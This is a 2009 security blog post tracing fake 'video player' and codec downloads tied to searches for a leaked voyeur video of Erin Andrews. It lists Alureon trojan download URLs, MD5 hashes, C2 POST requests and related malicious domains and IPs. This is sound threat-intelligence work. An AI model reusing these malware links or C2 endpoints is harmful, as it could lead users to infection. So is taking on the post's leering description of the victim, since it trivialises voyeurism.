Tuesday, July 21, 2009

Erin Andrews Peepshow Gone Bad?

Fox News and other media outlets are reporting ESPN sportscaster hottie Erin Andrews was a victim of a severe invasion of privacy. Per Fox News, "Sexy ESPN sportscaster Erin Andrews was the target of a peephole pervert who surreptitiously shot a video of her walking around her hotel room naked -- and posted it on the Internet."

So what happens next? Tons of people search for the video before it is pulled by authorities and cyber criminals race to put up rogue exploit sites tied to common internet searches. As an example, the Google search for "Erin Andrews video nude" results in a hit for http://digg.com/celebrity/Naked_Erin_Andrews_SEX_TAPE_online_free.

The digg.com link had comments with hyperlinks to the following sites (note: the sites seem to consistently change)

http://video.report-cnn.com/Erin_Andrews_Peephole_Video (7/20/09)
http://sexy-top-news.com/show.php?id=Erin_Andrews (7/21/09)
http://vsj-news.com/video.php?vid=erin_andrews_peephole_video (7/21/09)



So lets follow the links to see the video :)

video.report-cnn.com (72.232.116.51)

Wow, CNN Video has the video!



All I need to do is download this Live Video Player!



MediaPlayer.exe seems legitimate.



No movie :( - what happened???

The file MediaPlayer.exe was downloaded from simplexdoom.com (91.214.45.73).

GET: http://simplexdoom.com/download/395a695151773d3df7992c7620090715/MediaPlayer.exe
Referer: http://mediaplayer.4upd.com/Products/update_seven_win/-6478-332-34-en-hq-/mediatube.swf?clip=Erin Andrews Peephole Video

File: MediaPlayer.exe
Size: 86715
MD5: 9D05428AE376A369798B126358B74150

Per ThreatExpert, MediaPlayer.exe installs several Alueron malware components. Per CA, "Alueron is a family of trojans with a variety of components that can download and execute arbitrary files, hijack the browser to display fake web pages, and report affected user's queries performed with popular search engines."

During analysis, the Alueron malware made the following C2 connections.

POST /generator.php HTTP/1.0
Host: 91.214.45.73

POST /adc.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 91.214.45.73

Let's try again, it has to be out there.

vsj-news.com (174.36.240.140)

VSJ News has to have the video. All I need is a Flash video codec plugin!



FlashCodecPlugin.exe looks good!



No movie again :(

The file FlashCodecPlugin.exe was downloaded from bigdron.com (91.214.45.73).

GET http:///bigdron.com/download/6936413148673d3d4ae1782e20090701/FlashCodecPlugin.exe
Referer: http://vsj-news.com/video.php?vid=erin_andrews_peephole_video

File: FlashCodecPlugin.exe
Size: 88514
MD5: 87CFCC91FB9934E55D3C969997D2BDC1

Per ThreatExpert, FlashCodecPlugin.exe also installs several Alueron malware components.

The FlashCodecPlugin.exe Alueron malware also connects to the same C2 sites.

POST /generator.php HTTP/1.0
Host: 91.214.45.73

POST /adc.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 91.214.45.73

Well, so much for the video. Let's examine some of the domains and IP addresses associated with the Alueron malware.

Domain/IP Analysis

report-cnn.com [hosts fake video requiring codec] currently resolves to 72.232.116.51 (AS22576, Layered Technologies, US). Several other suspect domains currently resolve to 72.232.116.51:

bestcasinochat.com
bestcasinogroup.com
bestworldwidecasino.com
casinogametime.net
cavers.net
celeb-sextapes.info
chudnoj.com
darkblog.org
eblogic.com
extraspray.com
fashionclubcasino.net
ffssa.com
finadvisenow.com
finquotenow.com
flplace.com
freepornsearcher.net
freesexsearcher.net
inacall.com
kittyclubcasino.com
lenma.com
mediaplayer.4upd.com
medicalc.net
mifomatic.com
mortagequotenow.com
oops-boobs.com
pornomixer.ru
report-cnn.com
rosem.biz
sexy-babes-zone.com
sleepingbabe.info
smut-xxx.com
totalautoblog.com
truetrick.net
video.report-cnn.com
webartcreative.com
www.chudnoj.com
www.free-incest-movies.net
www.pornomixer.ru
www.sleepingbabe.info
www.xesdn.ru
x-light.info
xesdn.ru

simplexdoom.com [fake codec malware download site] currently resolves to 91.214.45.73 (AS44042, eSolutions, Belize). Several other suspect domains currently resolve to 91.214.45.73:

*.allincorx.com
*.bigdron.com
*.cikaredo.com
*.operationelx.com
*.oxxadox.com
*.paxxtiger.com
*.rstdeals.com
*.simplexdoom.com
allincorx.com
bigdron.com
cikaredo.com
detailedus.com
ns1.allincorx.com
ns1.bigdron.com
ns1.cikaredo.com
ns1.operationelx.com
ns1.oxxadox.com
ns1.paxxtiger.com
ns1.rstdeals.com
ns1.simplexdoom.com
ns2.allincorx.com
ns2.bigdron.com
ns2.cikaredo.com
ns2.operationelx.com
ns2.oxxadox.com
ns2.paxxtiger.com
ns2.rstdeals.com
ns2.simplexdoom.com
operationelx.com
oxxadox.com
paxxtiger.com
rstdeals.com
simplexdoom.com

vsj-news.com [hosts fake video requiring codec] currently resolves to 174.36.240.140 (AS36351, SOFTLAYER Technologies Inc., US). Several other suspect domains currently resolve to 174.36.240.140:

24kadra.net
avado.ru
bestdom2.ru
domivo4ka.com
gliant.com
kontaktzlo.ru
kozenko.ru
kurortnik.com.ua
livedom2.ru
simpletv.net
softlayer.org.ru
svet999.ru
vsj-news.com
wmsoft.ru
www.24kadra.net
www.bestdom2.ru
www.kurortnik.com.ua
www.livedom2.ru
www.simpletv.net
www.svet999.ru
ylati.ru

sexy-top-news.com [listed at digg.com, but down at the time of analysis] currently resolves to 195.88.191.21 (AS22576, Bigness Group Ltd., Russia). Several other suspect domains currently resolve to 195.88.191.21:

empire-of-tops.com
sexy-top-news.com
shocking-stars.net
video-trailers.net

Bottom line: social engineering tactics surrounding current events and pornographic material continue to be a preferred TTP for cyber criminals. There is no need to come up with exploit code, when users continue to "choose" to install malware themselves.

No comments: